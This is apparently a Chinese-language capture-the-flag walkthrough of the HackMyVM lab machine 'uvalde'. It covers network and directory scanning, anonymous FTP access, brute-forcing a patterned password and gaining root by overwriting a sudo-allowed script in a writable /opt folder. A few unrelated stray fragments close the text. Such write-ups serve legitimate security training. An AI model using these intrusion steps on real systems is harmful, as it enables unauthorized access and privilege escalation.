目錄
- 信息搜集
- 漏洞利用
- 權限提升
信息搜集
主機發現
┌──(kali?kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:10 EDT
Nmap scan report for dev.medusa.hmv (192.168.21.6)
Host is up (0.00015s latency).
MAC Address: 08:00:27:08:A9:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.10
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.41 seconds
端口掃描
┌──(kali?kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:11 EDT
Nmap scan report for dev.medusa.hmv (192.168.21.6)
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:08:A9:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds┌──(kali?kali)-[~]
└─$ nmap -sU --min-rate 10000 -p- 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:11 EDT
Warning: 192.168.21.6 giving up on port because retransmission cap hit (10).
Nmap scan report for dev.medusa.hmv (192.168.21.6)
Host is up (0.0013s latency).
All 65535 scanned ports on dev.medusa.hmv (192.168.21.6) are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 08:00:27:08:A9:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 72.98 seconds┌──(kali?kali)-[~]
└─$ nmap -sT -sV -O -p21,22,80 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-16 01:13 EDT
Nmap scan report for dev.medusa.hmv (192.168.21.6)
Host is up (0.00029s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:08:A9:3C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
漏洞利用
目錄掃描
┌──(kali?kali)-[~]
└─$ gobuster dir -u http://192.168.21.6 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.21.6
[+] Method: GET
[+] Threads: 10
[+] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,jpg,png,zip,git,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/index.php (Status: 200) [Size: 29604]
/img (Status: 301) [Size: 310] [--> http://192.168.21.6/img/]
/login.php (Status: 200) [Size: 1022]
/user.php (Status: 302) [Size: 0] [--> login.php]
/mail (Status: 301) [Size: 311] [--> http://192.168.21.6/mail/]
/css (Status: 301) [Size: 310] [--> http://192.168.21.6/css/]
/js (Status: 301) [Size: 309] [--> http://192.168.21.6/js/]
/success.php (Status: 302) [Size: 0] [--> login.php]
/vendor (Status: 301) [Size: 313] [--> http://192.168.21.6/vendor/]
/create_account.php (Status: 200) [Size: 1003]
/.html (Status: 403) [Size: 277]
/.php (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================
/login.php,/create_account.php發現登錄和注冊的頁面?
注冊一個用戶
解碼一下
密碼好像是用戶名+年份+@+四位數字,寫一個字典,尋找一下用戶名
21端口可以匿名登錄
┌──(kali?kali)-[~]
└─$ ftp 192.168.21.6
Connected to 192.168.21.6.
220 (vsFTPd 3.0.3)
Name (192.168.21.6:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||45247|)
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output
226 Directory send OK.
ftp>
下載下來,看看是什么
ftp> ls
229 Entering Extended Passive Mode (|||45247|)
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 5154 Jan 28 2023 output
226 Directory send OK.
ftp> get output
local: output remote: output
229 Entering Extended Passive Mode (|||58442|)
150 Opening BINARY mode data connection for output (5154 bytes).
100% |*******************| 5154 9.61 MiB/s 00:00 ETA
226 Transfer complete.
5154 bytes received in 00:00 (5.50 MiB/s)
┌──(kali?kali)-[~]
└─$ cat output
Script démarré sur 2023-01-28 19:54:05+01:00 [TERM="xterm-256color" TTY="/dev/pts/0" COLUMNS="105" LINES="25"]
matthew@debian:~$ id
uid=1000(matthew) gid=1000(matthew) groupes=1000(matthew)
matthew@debian:~$ ls -al
total 32
drwxr-xr-x 4 matthew matthew 4096 28 janv. 19:54 .
drwxr-xr-x 3 root root 4096 23 janv. 07:52 ..
lrwxrwxrwx 1 root root 9 23 janv. 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 matthew matthew 220 23 janv. 07:51 .bash_logout
-rw-r--r-- 1 matthew matthew 3526 23 janv. 07:51 .bashrc
drwx------ 3 matthew matthew 4096 23 janv. 08:04 .config
drwxr-xr-x 3 matthew matthew 4096 23 janv. 08:04 .local
-rw-r--r-- 1 matthew matthew 807 23 janv. 07:51 .profile
-rw-r--r-- 1 matthew matthew 0 28 janv. 19:54 typescript
-rwx------ 1 matthew matthew 33 23 janv. 07:53 user.txt
matthew@debian:~$ toilet -f mono12 -F metal hackmyvm.eu▄▄ ▄▄ ██ ██ ██▄████▄ ▄█████▄ ▄█████▄ ██ ▄██? ████▄██▄ ?██ ███ ██▄ ▄██ ████▄██▄ ██? ██ ? ▄▄▄██ ██? ? ██▄██ ██ ██ ██ ██▄ ██ ██ ██ ██ ██ ██ ██ ██ ▄██???██ ██ ██?██▄ ██ ██ ██ ████? ?█▄▄█? ██ ██ ██ ██ ██ ██▄▄▄███ ?██▄▄▄▄█ ██ ?█▄ ██ ██ ██ ███ ████ ██ ██ ██ ?? ?? ???? ?? ????? ?? ??? ?? ?? ?? ██ ?? ?? ?? ?? ███ ▄████▄ ██ ██ ██▄▄▄▄██ ██ ██ ██?????? ██ ██ ██ ?██▄▄▄▄█ ██▄▄▄███ ?? ????? ???? ?? matthew@debian:~$ exit
exitScript terminé sur 2023-01-28 19:54:37+01:00 [COMMAND_EXIT_CODE="0"]
創建一下matthew,來驗證有沒有這個用戶
嘗試用字典爆破這個用戶名得到其密碼:matthew2023@1554
權限提升
matthew@uvalde:~$ sudo -l
Matching Defaults entries for matthew on uvalde:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser matthew may run the following commands on uvalde:(ALL : ALL) NOPASSWD: /bin/bash /opt/superhack
matthew@uvalde:~$ cat /opt/superhack
#! /bin/bash
clear -xGRAS=$(tput bold)
JAUNE=$(tput setaf 3)$GRAS
BLANC=$(tput setaf 7)$GRAS
BLEU=$(tput setaf 4)$GRAS
VERT=$(tput setaf 2)$GRAS
ROUGE=$(tput setaf 1)$GRAS
RESET=$(tput sgr0)cat << EOL_______ __ __ _______ _______ ______ __ __ _______ _______ ___ _
| || | | || || || _ | | | | || _ || || | | |
| _____|| | | || _ || ___|| | || | |_| || |_| || || |_| |
| |_____ | |_| || |_| || |___ | |_||_ | || || || _|
|_____ || || ___|| ___|| __ || || || _|| |_ _____| || || | | |___ | | | || _ || _ || |_ | _ |
|_______||_______||___| |_______||___| |_||__| |__||__| |__||_______||___| |_|EOLprintf "${BLANC}Tool:${RESET} ${BLEU}superHack${RESET}\n"
printf "${BLANC}Author:${RESET} ${BLEU}hackerman${RESET}\n"
printf "${BLANC}Version:${RESET} ${BLEU}1.0${RESET}\n"printf "\n"[[ $# -ne 0 ]] && echo -e "${BLEU}Usage:${RESET} $0 domain" && exitwhile [ -z "$domain" ]; do
read -p "${VERT}domain to hack:${RESET} " domain
doneprintf "\n"n=50string=""
for ((i=0; i<$n; i++))
do
string+="."
donefor ((i=0; i<$n; i++))
do
string="${string/./#}"
printf "${BLANC}Hacking progress...:${RESET} ${BLANC}[$string]${RESET}\r"
sleep .09
doneprintf "\n"
printf "${JAUNE}Target $domain ====> PWNED${RESET}\n"
printf "${JAUNE}URL: https://$domain/*********************.php${RESET}\n"echo -e "\n${ROUGE}Pay 0.000047 BTC to 3FZbgi29cpjq2GjdwV8eyHuJJnkLtktZc5 to unlock backdoor.${RESET}\n"
matthew@uvalde:~$ cd /opt
matthew@uvalde:/opt$ mv superhack backup
matthew@uvalde:/opt$ echo 'bash' > superhack
matthew@uvalde:/opt$ sudo -l
Matching Defaults entries for matthew on uvalde:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser matthew may run the following commands on uvalde:(ALL : ALL) NOPASSWD: /bin/bash /opt/superhack
matthew@uvalde:/opt$ sudo /bin/bash /opt/superhack
root@uvalde:/opt# id
uid=0(root) gid=0(root) groups=0(root)
)
)
--PromptPilot (助手)答問之1)
 using `TU/lmr/m/n‘ instead)
ZLG CAN卡驅動封裝應用)